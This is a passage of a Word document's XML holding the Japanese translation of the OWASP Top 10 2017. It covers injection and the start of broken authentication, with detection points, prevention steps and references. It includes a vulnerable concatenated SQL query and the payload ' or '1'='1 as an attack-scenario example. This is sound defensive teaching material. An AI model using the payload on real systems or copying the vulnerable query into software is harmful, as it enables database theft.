          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId70">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ISO 27001: ISMS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId71">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">NIST Cyber Framework (US)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId72">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ASD Strategic Mitigations (AU)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId73">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">NIST CVSS 3.0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId74">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Microsoft Threat Modelling Tool</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="t10-owasp-top-10-アプリケーションセキュリティリスク--2017"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T10 OWASP Top 10 アプリケーションセキュリティリスク – 2017</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リスク</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">解説</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A1:2017-インジェクション</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A2:2017- 認証の不備</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A3:2017-機微な情報の露出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A4:2017-XML 外部エンティティ参照 (XXE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A5:2017-アクセス制御の不備</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A6:2017-不適切なセキュリティ設定</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A7:2017-クロスサイトスクリプティング (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A8:2017-安全でないデシリアライゼーション</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A9:2017-既知の脆弱性のあるコンポーネントの使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10:2017-不十分なロギングとモニタリング</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="102" w:name="a12017-インジェクション"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A1:2017-インジェクション</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 2 : 検出のしやすさ 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">環境変数、パラメータ、外部及び内部のWebサービス、そしてあらゆる種類のユーザといった、ほとんどすべてのデータソースはインジェクションの経路となりえます。</w:t>
            </w:r>
            <w:hyperlink r:id="rId79">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">インジェクション欠陥</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">は、攻撃者が悪意を持ったデータをインタープリタに送ることができる場合に発生します。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">インジェクション欠陥は、特にレガシーコードでは、とても一般的です。インジェクション脆弱性は、SQL、LDAP、XPath、あるい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tcPr/>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bookmarkStart w:id="81" w:name="脆弱性発見のポイント"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">次のような状況では、アプリケーションはこの攻撃に対して脆弱です:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ユーザが提供したデータが、アプリケーションによって検証、フィルタリング、またはサニタイズされない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">コンテキストに応じたエスケープが行われず、動的クエリまたはパラメータ化されていない呼出しがインタープリタに直接使用される。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">オブジェクト・リレーショナル・マッピング（ORM）の検索パラメータに悪意を持ったデータが使用され、重要なレコードを追加で抽出してしまう。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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55">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)と動的アプリケーションテストツール(</w:t>
      </w:r>
      <w:hyperlink r:id="rId80">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bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="防止方法"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">インジェクションを防止するためにはコマンドとクエリからデータを常に分けておくことが必要です。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">推奨される選択肢は安全なAPIを使用すること。インタープリタの使用を完全に避ける、パラメータ化されたインターフェースを利用する、または、オブジェクト・リレーショナル・マッピング・ツール（ORM）を使用するように移行すること。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ポジティブな、言い換えると「ホワイトリスト」によるサーバーサイドの入力検証を用いる。特殊文字を必要とする多くのアプリケーション、たとえばモバイルアプリケーション用のテキスト領域やAPIなどにおいては完全な防御方法とはならない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">上記の対応が困難な動的クエリでは、そのインタープリタ固有のエスケープ構文を使用して特殊文字をエスケープする。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">：テーブル名やカラム名などのSQLストラクチャに対してはエスケープができない。そのため、ユーザ指定のストラクチャ名は危険である。これはレポート作成ソフトウェアに存在する一般的な問題である。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">クエリ内でLIMIT句やその他のSQL制御を使用することで、SQLインジェクション攻撃が発生した場合のレコードの大量漏洩を防ぐ。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="攻撃シナリオの例"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: あるアプリケーションは信頼できないデータを用いることで以下のような脆弱なSQL呼び出しを作ってしまいます。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 同様に、アプリケーションがフレームワークを盲信すると、脆弱性のあるクエリになりえます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これら両方のケースにおいて、攻撃者はブラウザでパラメータ'id'の値を' or '1'='1に変更します。例えば:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://example.com/app/accountView?id=' or '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">これで、両方のクエリの意味が変えられ、accountsテーブルにあるレコードが全て返されることになります。さらなる攻撃により、データの改ざんや削除、ストアドプロシージャの呼び出しが可能です。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="101" w:name="参考資料-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="94" w:name="owasp-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId84">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Parameterize Queries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId85">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP ASVS: V5 Input Validation and Encoding</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId86">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Command Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ORM injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId89">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Injection Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId90">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: SQL Injection Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId91">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Injection Prevention in Java</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId92">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Query Parameterization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId93">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Automated Threats to Web Applications – OAT-014</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="100" w:name="外部資料"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId95">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-77: Command Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId96">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-89: SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId97">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-564: Hibernate Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId98">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-917: Expression Language Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId99">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger: Server-side template injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="124" w:name="a22017-認証の不備"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A2:2017-認証の不備</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 2 : 検出のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">一般的にユーザ認証とアクセス制御を設計・実装するため、認証の不備がよく見られ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tcPr/>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bookmarkStart w:id="104" w:name="脆弱性発見のポイント-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">有効なユーザ名とパスワードのリストを持つ攻撃者による</w:t>
      </w:r>
      <w:hyperlink r:id="rId103">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アカウントリスト攻撃</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">のような自動化された攻撃が成功する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">総当たり攻撃や、その他の自動化された攻撃が成功する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Password1"や"admin/admin"のような初期設定と同じパスワード、強度の弱いパスワード、よく使われるパスワードを登録できる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">安全に実装できない"秘密の質問"のように、脆弱または効果的でないパスワード復旧手順やパスワードリマインダを実装している。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">平文のパスワード、暗号化したパスワード、または脆弱なハッシュ関数でハッシュ化したパスワードを保存している(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A3:2017-機微な情報の露出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">を参照)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">多要素認証を実装していない、または効果的な多要素認証を実装していない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URLからセッションIDが露出している(例: URL書き換え)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ログインに成功した後でセッションIDが変更されない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">セッションIDが適切に無効にならない。ログアウトまたは一定時間操作がないとき、ユーザのセッションや認証トークン(特に、シングルサインオン(SSO)トークン)が適切に無効にならない。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="107" w:name="防止方法-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">自動化された攻撃、アカウントリスト攻撃、総当たり攻撃、盗まれたユーザ名/パスワードを再利用した攻撃を防ぐために、できる限り多要素認証を実装する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">初期アカウント(特に管理者ユーザ)を残したまま出荷およびリリースしない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">新しいパスワードまたは変更後のパスワードが</w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">top 10000 worst passwords</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">のリストにないか照合するようなパスワード検証を実装する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId106">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">や最近の調査に基づくパスワードの方針に、パスワードの長さ、複雑性、定期変更に関するポリシーを適合させる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
